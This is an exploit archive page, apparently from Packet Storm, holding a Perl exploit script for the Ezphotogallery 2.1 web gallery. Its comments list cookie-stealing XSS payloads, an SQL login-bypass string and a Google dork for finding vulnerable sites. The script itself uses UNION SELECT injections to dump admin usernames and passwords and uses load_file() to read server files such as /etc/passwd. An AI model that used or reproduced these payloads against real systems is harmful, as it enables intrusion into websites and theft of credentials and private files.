exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ezphotogallery21-sqlxssbypass.txt

ezphotogallery21-sqlxssbypass.txt
Posted Sep 11, 2008
Authored by IRCRASH | Site ircrash.com

Ezphotogallery version 2.1 suffers from cross site scripting, login bypass, SQL injection, and file disclosure vulnerabilities.

tags | exploit, vulnerability, xss, sql injection, bypass
SHA-256 | 98c6891ee9adb483d50fdb6ec68b3da37c498b292e0bd342d177a592a86d4ca3

ezphotogallery21-sqlxssbypass.txt

Change Mirror Download
#!/usr/bin/perl
#----------------------------------------------------------------
#
#Script : Ezphotogallery 2.1
#
#Type : Multiple Vulnerabilities ( Xss/Login Bypass/Sql injection Exploit/File Disclosure)
#
#Method : GET
#
#Alert : High
#
#Google Dork : "100% | 50% | 25%" "Back to gallery" inurl:"show.php?imageid="
#
#----------------------------------------------------------------
#
#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash
#
#My Official Website : HTTP://FEREIDANI.IR
#
#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com
#
#----------------------------------------------------------------
#
#Khashayar Fereidani Official Website : HTTP://FEREIDANI.IR
#
#----------------------------------------------------------------
#
#Script Download : http://heanet.dl.sourceforge.net/sourceforge/ezphotogallery/ezphotogallery-2.1.zip
#
#----------------------------------------------------------------
#Xss Vulnerabilities :
#
#Xss 1 : gallery.php?galleryid=<script>alert(document.cookie)</script>
#Xss 2 : show.php?imageid=156&size="''<?>>""''<script>alert(document.cookie)</script>
#Xss 3 : show.php?imageid=<script>alert(document.cookie)</script>
#
#----------------------------------------------------------------
#Login Bypass :
#
#Insert in gallery.php
#
#User : admin ' or ' 1=1
#Password : Dr.Crash
#
#----------------------------------------------------------------
#Sql Injection :
#
#Injection 1 : show.php?imageid=<sql>
#----------------------------------------------------------------
#
# Tnx : God
#
# HTTP://IRCRASH.COM
#
#----------------------------------------------------------------

use LWP;
use HTTP::Request;
use Getopt::Long;


$scriptname="Ezphotogallery 2.1";

sub header
{
print "
****************************************************
* $scriptname
****************************************************
*Discovered by : Khashayar Fereidani *
*Exploited by : Khashayar Fereidani *
*My Official Website : http://fereidani.ir *
****************************************************";
}

sub usage
{
print "
* Usage : perl $0 http://Example/
****************************************************
";
}


$url = ($ARGV[0]);

if(!$url)
{
header();
usage();
exit;
}
if($url !~ /\//){$url = $url."/";}
if($url !~ /http:\/\//){$url = "http://".$url;}
sub xpl1()
{
#concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e)
$vul = "/show.php?imageid=999+union+select+0,1,2,concat(0x4c6f67696e3a,name,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),4,5,6,7,8,9+from+users/*";
$requestpage = $url.$vul;


my $req = HTTP::Request->new("POST",$requestpage);
$ua = LWP::UserAgent->new;
$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req->referer($url);
$req->referer("IRCRASH.COM");
$req->content_type('application/x-www-form-urlencoded');
$req->header("content-length" => $contlen);
$req->content($poststring);

$response = $ua->request($req);
$content = $response->content;
$header = $response->headers_as_string();

@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/<enduser>/,$name);
$name = @name[0];

@password = split(/Password:/,$content);
$password = @password[1];
@password = split(/<endpass>/,$password);
$password = @password[0];

if(!$name && !$password)
{
print "\n\n";
print "!Exploit failed ! :(\n\n";
exit;
}

print "\n Username: ".$name."\n\n";
print " Password: " .$password."\n\n";


}


#XPL2

sub xpl2()
{
print "\n Example For File Address : /home/user/public_html/config.php\n Or /etc/passwd";
print "\n Enter File Address :";
$fil3 = <stdin>;

$vul = "/show.php?imageid=999+union+select+0,1,2,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),4,5,6,7,8,9+from+users/*";
$requestpage = $url.$vul;

my $req = HTTP::Request->new("POST",$requestpage);
$ua = LWP::UserAgent->new;
$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req->referer($url);
$req->referer("IRCRASH.COM");
$req->content_type('application/x-www-form-urlencoded');
$req->header("content-length" => $contlen);
$req->content($poststring);

$response = $ua->request($req);
$content = $response->content;
$header = $response->headers_as_string();


@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/<enduser>/,$name);
$name = @name[0];


if(!$name && !$password)
{
print "\n\n";
print "!Exploit failed ! :(\n\n";
exit;
}

open (FILE, ">".source.".txt");
print FILE $name;
close (FILE);
print " File Save In source.txt\n";
print "";

}

#XPL2 END
#Starting;
print "
****************************************************
* $scriptname
****************************************************
*Discovered by : Khashayar Fereidani *
*Exploited by : Khashayar Fereidani *
*My Official Website : http://fereidani.ir *
****************************************************
* Mod Options : *
* Mod 1 : Find Script username and password *
* Mod 2 : File Disclosure mode *
****************************************************";
print "\n \n Enter Mod : ";
$mod=<stdin>;
if ($mod=="1" or $mod=="2") { print "\n Exploiting .............. \n"; } else { print "\n Unknown Mod ! \n Exploit Failed !"; };
if ($mod=="1") { xpl1(); };
if ($mod=="2") { xpl2(); };
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close